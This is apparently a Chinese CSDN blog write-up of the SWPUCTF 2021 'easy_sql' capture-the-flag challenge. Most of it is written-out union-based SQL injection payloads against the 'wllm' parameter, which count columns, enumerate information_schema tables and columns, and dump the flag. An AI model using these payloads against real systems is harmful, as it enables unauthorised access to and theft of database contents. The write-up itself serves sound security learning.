SWPUCTF 2021 新生赛 easy_sql

文章描述了一次针对数据库的SQL注入尝试过程,包括查看源代码中的参数、检测字段数、回显点查询、获取数据库表信息以及flag数据的提取。这些操作展示了攻击者试图获取敏感数据的技术手段。
摘要由CSDN通过智能技术生成

打开题目,先查看源代码,发现参数是wllm

先试一下 ?wllm=1

判断字段数

?wllm=1' order by 1/2/3 --+,发现到4不行,说明字段数为3

查看回显点

?wllm=-1' union select 1,2,3 --+

查看数据库信息

爆表

?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db' --+

说明有两个表test_tb和users

先爆test_tb

?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb' --+

查flag

?wllm=-1' union select 1,2,group_concat(flag) from test_tb --+

  • 10
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值